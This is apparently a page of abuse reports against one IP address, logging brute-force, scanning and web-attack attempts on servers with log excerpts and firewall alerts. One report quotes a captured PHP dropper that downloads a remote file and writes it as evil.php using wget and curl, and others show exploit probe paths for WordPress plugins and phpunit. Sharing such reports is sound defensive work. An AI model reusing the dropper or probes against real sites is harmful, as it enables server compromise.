Anonymous
2024-11-20 08:22:20
(3 weeks ago)
Ports: 25,110,143,993,995; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH
rtbh.com.tr
2024-11-16 20:53:21
(3 weeks ago)
list.rtbh.com.tr report: tcp/0
Brute-Force
adalbertoreyes.org
2024-11-16 17:59:31
(3 weeks ago)
CategoryPortScan
Port Scan
mirekdusin
2024-11-16 06:24:00
(4 weeks ago)
"body": "<?php file_put_contents('evil.php',file_get_contents('http://164.90.169.189/ ... show more "body": "<?php file_put_contents('evil.php',file_get_contents('http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt')); if(!file_exists('evil.php')){ system('wget http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt -O evil.php;curl http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt -O evil.php'); }?>" show less
Web App Attack
rtbh.com.tr
2024-11-15 20:53:16
(4 weeks ago)
list.rtbh.com.tr report: tcp/0
Brute-Force
london2038.com
2024-11-15 17:16:47
(4 weeks ago)
Attacking WordPress
92.246.136.95 - - [15/Nov/2024:18:16:43 +0100] "POST /wp-content/plugins/w ... show more Attacking WordPress
92.246.136.95 - - [15/Nov/2024:18:16:43 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 17028 "-" "python-requests/2.27.1" show less
Brute-Force
Web App Attack
el-brujo
2024-11-15 16:47:02
(4 weeks ago)
15/Nov/2024:17:47:02.054574 +0100Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client ... show more 15/Nov/2024:17:47:02.054574 +0100Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 92.246.136.95] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "703"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "elhacker.info"] [uri "/Cursos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Zzd7BkSRR-EuYn0cyan6BwAAAvk"]
... show less
Hacking
Web App Attack
MortimerCat
2024-11-15 16:17:12
(4 weeks ago)
Unauthorised use of XMLRPC
Web App Attack
David Gebler
2024-11-15 15:39:34
(4 weeks ago)
92.246.136.95 - - [15/Nov/2024:15:39:33 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin ... show more 92.246.136.95 - - [15/Nov/2024:15:39:33 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" show less
Brute-Force
Web App Attack
MortimerCat
2024-11-15 12:57:53
(4 weeks ago)
Trying to access wordpress plugins
Web App Attack
hermawan
2024-11-15 06:45:36
(4 weeks ago)
[Fri Nov 15 13:44:20.504578 2024] [authz_core:error] [pid 189320:tid 128486656157376] [client 92.246 ... show more [Fri Nov 15 13:44:20.504578 2024] [authz_core:error] [pid 189320:tid 128486656157376] [client 92.246.136.95:42978] AH01630: client denied by server configuration: /var/www/administrator/index.php [staklim-jatim.bmkg.go.id] [staklim-jatim.bmkg.go.id] top=[189431] [ZtGI5bUJr14] [ZzbtxLYfKclmqISFkJ-7PgAAA40] keep_alive=[0] [2024-11-15 13:44:20.504585] [R:ZzbtxLYfKclmqISFkJ-7PgAAA40] UA:'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36' Host:'staklim-jatim.bmkg.go.id' ACCEPT:'*/*' Accept-Encoding:'gzip, deflate, br Upgrade-Insecure-Requests:'1
... show less
Hacking
Web App Attack
Apache
2024-11-15 06:40:33
(4 weeks ago)
(mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.n ... show more (mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.network): 5 in the last 300 secs show less
Brute-Force
Web App Attack
Aetherweb Ark
2024-11-15 04:40:46
(4 weeks ago)
(mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.n ... show more (mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.network): N in the last X secs show less
Web App Attack
TPI-Abuse
2024-11-15 04:31:52
(4 weeks ago)
(mod_security) mod_security (id:234930) triggered by 92.246.136.95 (wanting-wax-n1.aeza.network): 1 ... show more (mod_security) mod_security (id:234930) triggered by 92.246.136.95 (wanting-wax-n1.aeza.network): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 14 23:31:45.274598 2024] [security2:error] [pid 24570:tid 24570] [client 92.246.136.95:38770] [client 92.246.136.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\/lib\\\\/php\\\\/connector\\\\.minimal\\\\.php$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||www.doctoredwinalvarez.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] [hostname "www.doctoredwinalvarez.com"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "ZzbOscWhpAlv-u3GRqUT5QAAAAI"] show less
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2024-11-15 01:32:03
(4 weeks ago)
Bot / scanning and/or hacking attempts: POST /xmlrpc.php HTTP/1.1
Hacking
Web App Attack